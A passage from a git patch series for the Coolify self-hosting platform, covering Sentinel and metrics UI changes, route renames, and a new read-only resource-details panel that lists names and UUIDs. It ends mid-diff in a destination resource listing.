-                                $wire.set('sentinelCustomDockerImage', this.customImage);
-                            }
-                        }" x-init="$wire.set('sentinelCustomDockerImage', customImage)">
-                            <x-forms.input x-model="customImage" @input.debounce.500ms="saveCustomImage()"
-                                placeholder="e.g., sentinel:latest or myregistry/sentinel:dev"
-                                label="Custom Sentinel Docker Image (Dev Only)"
-                                helper="Override the default Sentinel Docker image for testing. Leave empty to use the default." />
-                        </div>
-                    @endif
-                    @if ($server->isSentinelEnabled())
-                        <div class="flex flex-wrap gap-2 sm:flex-nowrap items-end">
-                            <x-forms.input canGate="update" :canResource="$server" type="password" id="sentinelToken"
-                                label="Sentinel token" required helper="Token for Sentinel." />
-                            <x-forms.button canGate="update" :canResource="$server"
-                                wire:click="regenerateSentinelToken">Regenerate</x-forms.button>
-                        </div>
-
-                        <x-forms.input canGate="update" :canResource="$server" id="sentinelCustomUrl" required
-                            label="Coolify URL"
-                            helper="URL to your Coolify instance. If it is empty that means you do not have a FQDN set for your Coolify instance." />
-
-                        <div class="flex flex-col gap-2">
-                            <div class="flex flex-wrap gap-2 sm:flex-nowrap">
-                                <x-forms.input canGate="update" :canResource="$server" type="number" min="1"
-                                    id="sentinelMetricsRefreshRateSeconds" label="Metrics rate (seconds)" required
-                                    helper="Interval used for gathering metrics. Lower values result in more disk space usage." />
-                                <x-forms.input canGate="update" :canResource="$server" type="number" min="1"
-                                    id="sentinelMetricsHistoryDays"
-                                    label="Metrics history (days)" required
-                                    helper="Number of days to retain metrics data for." />
-                                <x-forms.input canGate="update" :canResource="$server" type="number" min="10"
-                                    id="sentinelPushIntervalSeconds" label="Push interval (seconds)" required
-                                    helper="Interval at which metrics data is sent to the collector." />
-                            </div>
-                        </div>
-                    @endif
-                </div>
-            </form>
+            @endif
         </div>
-    </div>
+        <div class="flex flex-col gap-2">
+            @if ($isSentinelEnabled && isDev())
+                <div class="w-full sm:w-96">
+                    <x-forms.checkbox canGate="update" :canResource="$server" id="isSentinelDebugEnabled"
+                        label="Enable Sentinel (with debug)" instantSave />
+                </div>
+            @endif
+            @if (isDev() && $server->isSentinelEnabled())
+                <div class="pt-4" x-data="{
+                    customImage: localStorage.getItem('sentinel_custom_docker_image_{{ $server->uuid }}') || '',
+                    saveCustomImage() {
+                        localStorage.setItem('sentinel_custom_docker_image_{{ $server->uuid }}', this.customImage);
+                        $wire.set('sentinelCustomDockerImage', this.customImage);
+                    }
+                }" x-init="$wire.set('sentinelCustomDockerImage', customImage)">
+                    <x-forms.input x-model="customImage" @input.debounce.500ms="saveCustomImage()"
+                        placeholder="e.g., sentinel:latest or myregistry/sentinel:dev"
+                        label="Custom Sentinel Docker Image (Dev Only)"
+                        helper="Override the default Sentinel Docker image for testing. Leave empty to use the default." />
+                </div>
+            @endif
+            @if ($server->isSentinelEnabled())
+                <div class="flex flex-wrap gap-2 sm:flex-nowrap items-end">
+                    <x-forms.input canGate="update" :canResource="$server" id="sentinelCustomUrl" required
+                        label="Coolify URL"
+                        helper="URL to your Coolify instance. If it is empty that means you do not have a FQDN set for your Coolify instance." />
+                    <x-forms.input canGate="update" :canResource="$server" type="password" id="sentinelToken"
+                        label="Sentinel token" required helper="Token for Sentinel." />
+                    <x-forms.button canGate="update" :canResource="$server"
+                        wire:click="regenerateSentinelToken">Regenerate</x-forms.button>
+                </div>
+
+                <div class="flex flex-col gap-2">
+                    <div class="flex flex-wrap gap-2 sm:flex-nowrap">
+                        <x-forms.input canGate="update" :canResource="$server" type="number" min="1"
+                            id="sentinelMetricsRefreshRateSeconds" label="Metrics rate (seconds)" required
+                            helper="Interval used for gathering metrics. Lower values result in more disk space usage." />
+                        <x-forms.input canGate="update" :canResource="$server" type="number" min="1"
+                            id="sentinelMetricsHistoryDays"
+                            label="Metrics history (days)" required
+                            helper="Number of days to retain metrics data for." />
+                        <x-forms.input canGate="update" :canResource="$server" type="number" min="10"
+                            id="sentinelPushIntervalSeconds" label="Push interval (seconds)" required
+                            helper="Interval at which metrics data is sent to the collector." />
+                    </div>
+                </div>
+            @endif
+        </div>
+    </form>
 </div>
diff --git a/resources/views/livewire/server/sentinel/logs.blade.php b/resources/views/livewire/server/sentinel/logs.blade.php
new file mode 100644
index 000000000..f92f0ab42
--- /dev/null
+++ b/resources/views/livewire/server/sentinel/logs.blade.php
@@ -0,0 +1,13 @@
+<div>
+    <x-slot:title>
+        Sentinel Logs | Coolify
+    </x-slot>
+    <livewire:server.navbar :server="$server" />
+    <div class="flex flex-col h-full gap-8 sm:flex-row">
+        <x-server.sidebar-sentinel :server="$server" :parameters="$parameters" />
+        <div class="w-full">
+            <h2 class="pb-4">Logs</h2>
+            <livewire:project.shared.get-logs :server="$server" container="coolify-sentinel" displayName="Sentinel" :collapsible="false" />
+        </div>
+    </div>
+</div>
diff --git a/resources/views/livewire/server/sentinel/show.blade.php b/resources/views/livewire/server/sentinel/show.blade.php
new file mode 100644
index 000000000..d859a5e14
--- /dev/null
+++ b/resources/views/livewire/server/sentinel/show.blade.php
@@ -0,0 +1,16 @@
+<div>
+    <x-slot:title>
+        Sentinel Configuration | Coolify
+    </x-slot>
+    <livewire:server.navbar :server="$server" />
+    @if ($server->isFunctional())
+        <div class="flex flex-col h-full gap-8 sm:flex-row">
+            <x-server.sidebar-sentinel :server="$server" :parameters="$parameters" />
+            <div class="w-full">
+                <livewire:server.sentinel :server="$server" />
+            </div>
+        </div>
+    @else
+        <div>Server is not validated. Validate first.</div>
+    @endif
+</div>
diff --git a/routes/web.php b/routes/web.php
index fad3c5d29..e739adba4 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -57,7 +57,8 @@
 use App\Livewire\Server\Resources as ResourcesShow;
 use App\Livewire\Server\Security\Patches;
 use App\Livewire\Server\Security\TerminalAccess;
-use App\Livewire\Server\Sentinel as ServerSentinel;
+use App\Livewire\Server\Sentinel\Logs as SentinelLogs;
+use App\Livewire\Server\Sentinel\Show as SentinelShow;
 use App\Livewire\Server\Show as ServerShow;
 use App\Livewire\Server\Swarm as ServerSwarm;
 use App\Livewire\Settings\Advanced as SettingsAdvanced;
@@ -279,7 +280,8 @@
         Route::get('/', ServerShow::class)->name('server.show');
         Route::get('/advanced', ServerAdvanced::class)->name('server.advanced');
         Route::get('/swarm', ServerSwarm::class)->name('server.swarm');
-        Route::get('/sentinel', ServerSentinel::class)->name('server.sentinel');
+        Route::get('/sentinel', SentinelShow::class)->name('server.sentinel');
+        Route::get('/sentinel/logs', SentinelLogs::class)->name('server.sentinel.logs');
         Route::get('/private-key', PrivateKeyShow::class)->name('server.private-key');
         Route::get('/cloud-provider-token', CloudProviderTokenShow::class)->name('server.cloud-provider-token');
         Route::get('/ca-certificate', CaCertificateShow::class)->name('server.ca-certificate');

From f8d095c9b9753bb607fdfa278787be16a2f17608 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Tue, 14 Apr 2026 18:59:08 +0530
Subject: [PATCH 07/90] fix(routes): fix application metrics link and rename
 server.charts to server.metrics

---
 resources/views/components/server/sidebar.blade.php       | 2 +-
 resources/views/livewire/project/shared/metrics.blade.php | 2 +-
 routes/web.php                                            | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/resources/views/components/server/sidebar.blade.php b/resources/views/components/server/sidebar.blade.php
index 82ec985e3..63590f768 100644
--- a/resources/views/components/server/sidebar.blade.php
+++ b/resources/views/components/server/sidebar.blade.php
@@ -32,7 +32,7 @@
         <a class="sub-menu-item {{ $activeMenu === 'log-drains' ? 'menu-item-active' : '' }}" {{ wireNavigate() }}
             href="{{ route('server.log-drains', ['server_uuid' => $server->uuid]) }}"><span class="menu-item-label">Log Drains</span></a>
         <a class="sub-menu-item {{ $activeMenu === 'metrics' ? 'menu-item-active' : '' }}" {{ wireNavigate() }}
-            href="{{ route('server.charts', ['server_uuid' => $server->uuid]) }}"><span class="menu-item-label">Metrics</span></a>
+            href="{{ route('server.metrics', ['server_uuid' => $server->uuid]) }}"><span class="menu-item-label">Metrics</span></a>
     @endif
     @if (!$server->isBuildServer() && !$server->settings->is_cloudflare_tunnel)
         <a class="sub-menu-item {{ $activeMenu === 'swarm' ? 'menu-item-active' : '' }}" {{ wireNavigate() }}
diff --git a/resources/views/livewire/project/shared/metrics.blade.php b/resources/views/livewire/project/shared/metrics.blade.php
index 728f7fef4..e94a691d3 100644
--- a/resources/views/livewire/project/shared/metrics.blade.php
+++ b/resources/views/livewire/project/shared/metrics.blade.php
@@ -8,7 +8,7 @@
             <div class="alert alert-warning">Metrics are not available for Docker Compose applications yet!</div>
         @elseif(!$resource->destination->server->isMetricsEnabled())
             <div class="alert alert-warning pb-1">Metrics are only available for servers with Sentinel & Metrics enabled!</div>
-            <div>Go to <a class="underline dark:text-white" href="{{ route('server.show', $resource->destination->server->uuid) }}/sentinel" {{ wireNavigate() }}>Server settings</a> to enable it.</div>
+            <div>Go to <a class="underline dark:text-white" href="{{ route('server.metrics', ['server_uuid' => $resource->destination->server->uuid]) }}" {{ wireNavigate() }}>Server Metrics</a> to enable it.</div>
         @else
             @if (!str($resource->status)->contains('running'))
                 <div class="alert alert-warning">Metrics are only available when the application container is running!</div>
diff --git a/routes/web.php b/routes/web.php
index e739adba4..80760aff4 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -289,7 +289,7 @@
         Route::get('/cloudflare-tunnel', CloudflareTunnel::class)->name('server.cloudflare-tunnel');
         Route::get('/destinations', ServerDestinations::class)->name('server.destinations');
         Route::get('/log-drains', LogDrains::class)->name('server.log-drains');
-        Route::get('/metrics', ServerCharts::class)->name('server.charts');
+        Route::get('/metrics', ServerCharts::class)->name('server.metrics');
         Route::get('/danger', DeleteServer::class)->name('server.delete');
         Route::get('/proxy', ProxyShow::class)->name('server.proxy');
         Route::get('/proxy/dynamic', ProxyDynamicConfigurations::class)->name('server.proxy.dynamic-confs');

From 65ca7e2df36feb1dbdcce65295be58fbba977647 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Tue, 14 Apr 2026 19:01:01 +0530
Subject: [PATCH 08/90] refactor(ui): use callout components for application
 metrics alerts

---
 .../livewire/project/shared/metrics.blade.php      | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/resources/views/livewire/project/shared/metrics.blade.php b/resources/views/livewire/project/shared/metrics.blade.php
index e94a691d3..e86a86226 100644
--- a/resources/views/livewire/project/shared/metrics.blade.php
+++ b/resources/views/livewire/project/shared/metrics.blade.php
@@ -5,13 +5,19 @@
     <div class="pb-4">Basic metrics for your application container.</div>
     <div>
         @if ($resource->getMorphClass() === 'App\Models\Application' && $resource->build_pack === 'dockercompose')
-            <div class="alert alert-warning">Metrics are not available for Docker Compose applications yet!</div>
+            <x-callout type="warning" title="Not Available">
+                Metrics are not available for Docker Compose applications yet!
+            </x-callout>
         @elseif(!$resource->destination->server->isMetricsEnabled())
-            <div class="alert alert-warning pb-1">Metrics are only available for servers with Sentinel & Metrics enabled!</div>
-            <div>Go to <a class="underline dark:text-white" href="{{ route('server.metrics', ['server_uuid' => $resource->destination->server->uuid]) }}" {{ wireNavigate() }}>Server Metrics</a> to enable it.</div>
+            <x-callout type="info" title="Metrics Not Enabled">
+                Metrics are only available for servers with Sentinel & Metrics enabled.
+                Go to <a class="underline font-semibold" href="{{ route('server.metrics', ['server_uuid' => $resource->destination->server->uuid]) }}" {{ wireNavigate() }}>Server Metrics</a> to enable it.
+            </x-callout>
         @else
             @if (!str($resource->status)->contains('running'))
-                <div class="alert alert-warning">Metrics are only available when the application container is running!</div>
+                <x-callout type="warning" title="Container Not Running">
+                    Metrics are only available when the application container is running!
+                </x-callout>
             @else
                 <div>
                 <x-forms.select label="Interval" wire:change="setInterval" id="interval">

From 2a5e1f483855bb675dff4585f40340452b07df6c Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Tue, 14 Apr 2026 19:05:40 +0530
Subject: [PATCH 09/90] fix(ui): server metrics charts were not loading after
 enabling metrics

---
 app/Livewire/Server/Charts.php | 1 +
 1 file changed, 1 insertion(+)

diff --git a/app/Livewire/Server/Charts.php b/app/Livewire/Server/Charts.php
index c09c11b60..7c555959f 100644
--- a/app/Livewire/Server/Charts.php
+++ b/app/Livewire/Server/Charts.php
@@ -43,6 +43,7 @@ public function toggleMetrics()
             if ($this->server->isMetricsEnabled()) {
                 StartSentinel::run($this->server, true);
                 $this->dispatch('success', 'Metrics enabled. Restarting Sentinel.');
+                $this->redirect(route('server.metrics', ['server_uuid' => $this->server->uuid]), navigate: true);
             } else {
                 $this->server->restartSentinel();
                 $this->dispatch('success', 'Metrics disabled. Restarting Sentinel.');

From 2ca0ee7d197d9be39b33af1e4299f263e93b79eb Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Tue, 14 Apr 2026 19:11:27 +0530
Subject: [PATCH 10/90] feat(ui): show warning callout on sentinel page if
 sentinel is out of sync

---
 resources/views/livewire/server/sentinel.blade.php | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/resources/views/livewire/server/sentinel.blade.php b/resources/views/livewire/server/sentinel.blade.php
index 95e8c64e2..bbe0b7037 100644
--- a/resources/views/livewire/server/sentinel.blade.php
+++ b/resources/views/livewire/server/sentinel.blade.php
@@ -15,7 +15,12 @@
                 </div>
             @endif
         </div>
-        <div class="flex flex-col gap-2">
+        @if ($isSentinelEnabled && !$server->isSentinelLive())
+            <x-callout type="warning" title="Out of Sync" class="mt-2">
+                Sentinel is not in sync with your server. Click "Sync" to re-sync.
+            </x-callout>
+        @endif
+        <div class="flex flex-col gap-2 pt-2">
             @if ($isSentinelEnabled && isDev())
                 <div class="w-full sm:w-96">
                     <x-forms.checkbox canGate="update" :canResource="$server" id="isSentinelDebugEnabled"

From 3f88e85aacfbdad7b62c7f588d4f221a173c61ae Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Thu, 23 Apr 2026 14:53:31 +0530
Subject: [PATCH 11/90] feat(ui): add resource details view

---
 .../Project/Application/Configuration.php     |  2 +-
 .../Project/Database/Configuration.php        |  2 +-
 .../Project/Service/Configuration.php         |  2 +-
 .../Project/Shared/ResourceDetails.php        | 91 +++++++++++++++++++
 .../components/forms/copy-button.blade.php    | 13 ++-
 .../project/application/general.blade.php     |  3 +
 .../database/clickhouse/general.blade.php     |  3 +
 .../database/dragonfly/general.blade.php      |  3 +
 .../project/database/keydb/general.blade.php  |  3 +
 .../database/mariadb/general.blade.php        |  3 +
 .../database/mongodb/general.blade.php        |  3 +
 .../project/database/mysql/general.blade.php  |  3 +
 .../database/postgresql/general.blade.php     |  3 +
 .../project/database/redis/general.blade.php  |  3 +
 .../project/service/stack-form.blade.php      |  3 +
 .../project/shared/resource-details.blade.php | 57 ++++++++++++
 16 files changed, 191 insertions(+), 6 deletions(-)
 create mode 100644 app/Livewire/Project/Shared/ResourceDetails.php
 create mode 100644 resources/views/livewire/project/shared/resource-details.blade.php

diff --git a/app/Livewire/Project/Application/Configuration.php b/app/Livewire/Project/Application/Configuration.php
index cc1bf15b9..ad025bed5 100644
--- a/app/Livewire/Project/Application/Configuration.php
+++ b/app/Livewire/Project/Application/Configuration.php
@@ -35,7 +35,7 @@ public function mount()
 
         $project = currentTeam()
             ->projects()
-            ->select('id', 'uuid', 'team_id')
+            ->select('id', 'uuid', 'name', 'team_id')
             ->where('uuid', request()->route('project_uuid'))
             ->firstOrFail();
         $environment = $project->environments()
diff --git a/app/Livewire/Project/Database/Configuration.php b/app/Livewire/Project/Database/Configuration.php
index 7c64a6eef..a62fbf2fe 100644
--- a/app/Livewire/Project/Database/Configuration.php
+++ b/app/Livewire/Project/Database/Configuration.php
@@ -34,7 +34,7 @@ public function mount()
 
             $project = currentTeam()
                 ->projects()
-                ->select('id', 'uuid', 'team_id')
+                ->select('id', 'uuid', 'name', 'team_id')
                 ->where('uuid', request()->route('project_uuid'))
                 ->firstOrFail();
             $environment = $project->environments()
diff --git a/app/Livewire/Project/Service/Configuration.php b/app/Livewire/Project/Service/Configuration.php
index 2d69ceb12..bf0a6b6a2 100644
--- a/app/Livewire/Project/Service/Configuration.php
+++ b/app/Livewire/Project/Service/Configuration.php
@@ -51,7 +51,7 @@ public function mount()
             $this->query = request()->query();
             $project = currentTeam()
                 ->projects()
-                ->select('id', 'uuid', 'team_id')
+                ->select('id', 'uuid', 'name', 'team_id')
                 ->where('uuid', request()->route('project_uuid'))
                 ->firstOrFail();
             $environment = $project->environments()
diff --git a/app/Livewire/Project/Shared/ResourceDetails.php b/app/Livewire/Project/Shared/ResourceDetails.php
new file mode 100644
index 000000000..8a4117c39
--- /dev/null
+++ b/app/Livewire/Project/Shared/ResourceDetails.php
@@ -0,0 +1,91 @@
+<?php
+
+namespace App\Livewire\Project\Shared;
+
+use App\Models\Service;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class ResourceDetails extends Component
+{
+    use AuthorizesRequests;
+
+    public $resource;
+
+    public ?string $project_uuid = null;
+
+    public ?string $project_name = null;
+
+    public ?string $environment_uuid = null;
+
+    public ?string $environment_name = null;
+
+    public ?string $server_uuid = null;
+
+    public ?string $server_name = null;
+
+    public array $stack_applications = [];
+
+    public array $stack_databases = [];
+
+    public function mount()
+    {
+        $this->authorize('view', $this->resource);
+
+        $environment = $this->resource->environment ?? null;
+        if ($environment) {
+            $this->environment_uuid = $environment->uuid;
+            $this->environment_name = $environment->name;
+            $project = $environment->project ?? null;
+            if ($project) {
+                $this->project_uuid = $project->uuid;
+                $this->project_name = $project->name;
+            }
+        }
+
+        $server = $this->resolveServer();
+        if ($server) {
+            $this->server_uuid = $server->uuid;
+            $this->server_name = $server->name;
+        }
+
+        if ($this->resource instanceof Service) {
+            $this->stack_applications = $this->resource->applications
+                ->map(fn ($app) => [
+                    'name' => $app->human_name ?: $app->name,
+                    'uuid' => $app->uuid,
+                ])
+                ->values()
+                ->all();
+
+            $this->stack_databases = $this->resource->databases
+                ->map(fn ($db) => [
+                    'name' => $db->human_name ?: $db->name,
+                    'uuid' => $db->uuid,
+                ])
+                ->values()
+                ->all();
+        }
+    }
+
+    private function resolveServer()
+    {
+        try {
+            if (isset($this->resource->destination) && $this->resource->destination && isset($this->resource->destination->server)) {
+                return $this->resource->destination->server;
+            }
+            if (method_exists($this->resource, 'server') && $this->resource->server) {
+                return $this->resource->server;
+            }
+        } catch (\Throwable $e) {
+            return null;
+        }
+
+        return null;
+    }
+
+    public function render()
+    {
+        return view('livewire.project.shared.resource-details');
+    }
+}
diff --git a/resources/views/components/forms/copy-button.blade.php b/resources/views/components/forms/copy-button.blade.php
index 12fadc595..eb3f3d8a4 100644
--- a/resources/views/components/forms/copy-button.blade.php
+++ b/resources/views/components/forms/copy-button.blade.php
@@ -1,7 +1,13 @@
-@props(['text'])
+@props(['text', 'label' => null])
 
-<div class="relative" x-data="{ copied: false, isSecure: window.isSecureContext }">
-    <input type="text" value="{{ $text }}" readonly class="input">
+<div class="w-full" x-data="{ copied: false, isSecure: window.isSecureContext }">
+    @if ($label)
+        <label class="flex gap-1 items-center mb-1 text-sm font-medium">{{ $label }}</label>
+    @endif
+    <div class="relative">
+        <input type="text" value="{{ $text }}" class="input pr-10"
+            @keydown.prevent @paste.prevent @cut.prevent @drop.prevent
+            @focus="$event.target.select()">
     <button
         x-show="isSecure"
         @click.prevent="copied = true; navigator.clipboard.writeText({{ Js::from($text) }}); setTimeout(() => copied = false, 1000)"
@@ -15,4 +21,5 @@ class="absolute right-2 top-1/2 -translate-y-1/2 p-1.5 text-gray-400 hover:text-
             <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7" />
         </svg>
     </button>
+    </div>
 </div>
diff --git a/resources/views/livewire/project/application/general.blade.php b/resources/views/livewire/project/application/general.blade.php
index fe3ef3686..e0d1153e8 100644
--- a/resources/views/livewire/project/application/general.blade.php
+++ b/resources/views/livewire/project/application/general.blade.php
@@ -12,6 +12,9 @@
                 <div>{{ $application->compose_parsing_version }}</div>
             @endif
             <x-forms.button canGate="update" :canResource="$application" type="submit">Save</x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$application" />
+            </x-modal-input>
             @if ($buildPack === 'dockercompose')
                 <x-forms.button canGate="update" :canResource="$application" wire:target='initLoadingCompose'
                     x-on:click="$wire.dispatch('loadCompose', false)">
diff --git a/resources/views/livewire/project/database/clickhouse/general.blade.php b/resources/views/livewire/project/database/clickhouse/general.blade.php
index 9283172ad..5fd006e8e 100644
--- a/resources/views/livewire/project/database/clickhouse/general.blade.php
+++ b/resources/views/livewire/project/database/clickhouse/general.blade.php
@@ -5,6 +5,9 @@
             <x-forms.button type="submit" canGate="update" :canResource="$database">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex gap-2">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/dragonfly/general.blade.php b/resources/views/livewire/project/database/dragonfly/general.blade.php
index ce46e47dd..0e29948a2 100644
--- a/resources/views/livewire/project/database/dragonfly/general.blade.php
+++ b/resources/views/livewire/project/database/dragonfly/general.blade.php
@@ -5,6 +5,9 @@
             <x-forms.button type="submit" canGate="update" :canResource="$database">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex gap-2">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/keydb/general.blade.php b/resources/views/livewire/project/database/keydb/general.blade.php
index ee3f8fd0c..1964fd5f3 100644
--- a/resources/views/livewire/project/database/keydb/general.blade.php
+++ b/resources/views/livewire/project/database/keydb/general.blade.php
@@ -5,6 +5,9 @@
             <x-forms.button type="submit" canGate="update" :canResource="$database">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex gap-2">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/mariadb/general.blade.php b/resources/views/livewire/project/database/mariadb/general.blade.php
index 1154124d1..ab6badda5 100644
--- a/resources/views/livewire/project/database/mariadb/general.blade.php
+++ b/resources/views/livewire/project/database/mariadb/general.blade.php
@@ -5,6 +5,9 @@
             <x-forms.button type="submit" canGate="update" :canResource="$database">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex gap-2">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/mongodb/general.blade.php b/resources/views/livewire/project/database/mongodb/general.blade.php
index e9e5d621d..787bc7ad5 100644
--- a/resources/views/livewire/project/database/mongodb/general.blade.php
+++ b/resources/views/livewire/project/database/mongodb/general.blade.php
@@ -5,6 +5,9 @@
             <x-forms.button type="submit" canGate="update" :canResource="$database">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex gap-2">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/mysql/general.blade.php b/resources/views/livewire/project/database/mysql/general.blade.php
index bb3916ec8..80dcad117 100644
--- a/resources/views/livewire/project/database/mysql/general.blade.php
+++ b/resources/views/livewire/project/database/mysql/general.blade.php
@@ -5,6 +5,9 @@
             <x-forms.button type="submit">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex gap-2">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/postgresql/general.blade.php b/resources/views/livewire/project/database/postgresql/general.blade.php
index 9c956f5b3..3f51bf31d 100644
--- a/resources/views/livewire/project/database/postgresql/general.blade.php
+++ b/resources/views/livewire/project/database/postgresql/general.blade.php
@@ -19,6 +19,9 @@
             <x-forms.button type="submit" canGate="update" :canResource="$database">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex flex-wrap gap-2 sm:flex-nowrap">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/redis/general.blade.php b/resources/views/livewire/project/database/redis/general.blade.php
index 73ee5f0e5..e644a9107 100644
--- a/resources/views/livewire/project/database/redis/general.blade.php
+++ b/resources/views/livewire/project/database/redis/general.blade.php
@@ -5,6 +5,9 @@
             <x-forms.button type="submit" canGate="update" :canResource="$database">
                 Save
             </x-forms.button>
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$database" />
+            </x-modal-input>
         </div>
         <div class="flex gap-2">
             <x-forms.input label="Name" id="name" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/service/stack-form.blade.php b/resources/views/livewire/project/service/stack-form.blade.php
index e63e7a509..0aec7c873 100644
--- a/resources/views/livewire/project/service/stack-form.blade.php
+++ b/resources/views/livewire/project/service/stack-form.blade.php
@@ -12,6 +12,9 @@
                     <livewire:project.service.edit-compose serviceId="{{ $service->id }}" />
                 </x-modal-input>
             @endcan
+            <x-modal-input title="Resource Details" buttonTitle="Details">
+                <livewire:project.shared.resource-details :resource="$service" />
+            </x-modal-input>
         </div>
         <div>Configuration</div>
     </div>
diff --git a/resources/views/livewire/project/shared/resource-details.blade.php b/resources/views/livewire/project/shared/resource-details.blade.php
new file mode 100644
index 000000000..3be82da12
--- /dev/null
+++ b/resources/views/livewire/project/shared/resource-details.blade.php
@@ -0,0 +1,57 @@
+<div class="w-full max-h-[70vh] overflow-y-auto pr-1 -mt-4">
+    <div class="pb-4 text-sm dark:text-neutral-400">Identifiers for this resource. Read-only</div>
+
+    <div class="flex flex-col gap-6">
+        <div>
+            <h3>Resource</h3>
+            <div class="pt-2 grid grid-cols-1 gap-3 md:grid-cols-2">
+                <x-forms.copy-button label="Name" :text="$resource->name ?? ''" />
+                <x-forms.copy-button label="UUID" :text="$resource->uuid ?? ''" />
+            </div>
+        </div>
+
+        @if ($environment_uuid)
+            <div>
+                <h3>Environment</h3>
+                <div class="pt-2 grid grid-cols-1 gap-3 md:grid-cols-2">
+                    <x-forms.copy-button label="Name" :text="$environment_name ?? ''" />
+                    <x-forms.copy-button label="UUID" :text="$environment_uuid" />
+                </div>
+            </div>
+        @endif
+
+        @if ($project_uuid)
+            <div>
+                <h3>Project</h3>
+                <div class="pt-2 grid grid-cols-1 gap-3 md:grid-cols-2">
+                    <x-forms.copy-button label="Name" :text="$project_name ?? ''" />
+                    <x-forms.copy-button label="UUID" :text="$project_uuid" />
+                </div>
+            </div>
+        @endif
+
+        @if ($server_uuid)
+            <div>
+                <h3>Server</h3>
+                <div class="pt-2 grid grid-cols-1 gap-3 md:grid-cols-2">
+                    <x-forms.copy-button label="Name" :text="$server_name ?? ''" />
+                    <x-forms.copy-button label="UUID" :text="$server_uuid" />
+                </div>
+            </div>
+        @endif
+
+        @if (! empty($stack_applications) || ! empty($stack_databases))
+            <div>
+                <h3>Stack Sub-Resources</h3>
+                <div class="pt-2 grid grid-cols-1 gap-3 md:grid-cols-2">
+                    @foreach ($stack_applications as $item)
+                        <x-forms.copy-button :label="'Application — ' . $item['name']" :text="$item['uuid']" />
+                    @endforeach
+                    @foreach ($stack_databases as $item)
+                        <x-forms.copy-button :label="'Database — ' . $item['name']" :text="$item['uuid']" />
+                    @endforeach
+                </div>
+            </div>
+        @endif
+    </div>
+</div>

From d371f0ed28f14d7700b668db364a369d4c19d30b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Thu, 23 Apr 2026 16:13:09 +0530
Subject: [PATCH 12/90] feat(destination): show resources that are deployed on
 the destination

---
 app/Livewire/Destination/Show.php             | 62 +++++++++++++++++++
 app/Models/StandaloneDocker.php               |  5 +-
 .../views/livewire/destination/show.blade.php | 20 ++++++
 3 files changed, 86 insertions(+), 1 deletion(-)

diff --git a/app/Livewire/Destination/Show.php b/app/Livewire/Destination/Show.php
index 9d55d7462..11afbbccc 100644
--- a/app/Livewire/Destination/Show.php
+++ b/app/Livewire/Destination/Show.php
@@ -24,6 +24,8 @@ class Show extends Component
     #[Validate(['string', 'required'])]
     public string $serverIp;
 
+    public array $resources = [];
+
     public function mount(string $destination_uuid)
     {
         try {
@@ -33,11 +35,71 @@ public function mount(string $destination_uuid)
             }
             $this->destination = $destination;
             $this->syncData();
+            $this->loadResources();
         } catch (\Throwable $e) {
             return handleError($e, $this);
         }
     }
 
+    public function loadResources(): void
+    {
+        if ($this->destination->getMorphClass() !== \App\Models\StandaloneDocker::class) {
+            return;
+        }
+
+        $this->resources = $this->collectResources([
+            $this->destination->applications,
+            $this->destination->services,
+            $this->destination->postgresqls,
+            $this->destination->redis,
+            $this->destination->mongodbs,
+            $this->destination->mysqls,
+            $this->destination->mariadbs,
+            $this->destination->keydbs,
+            $this->destination->dragonflies,
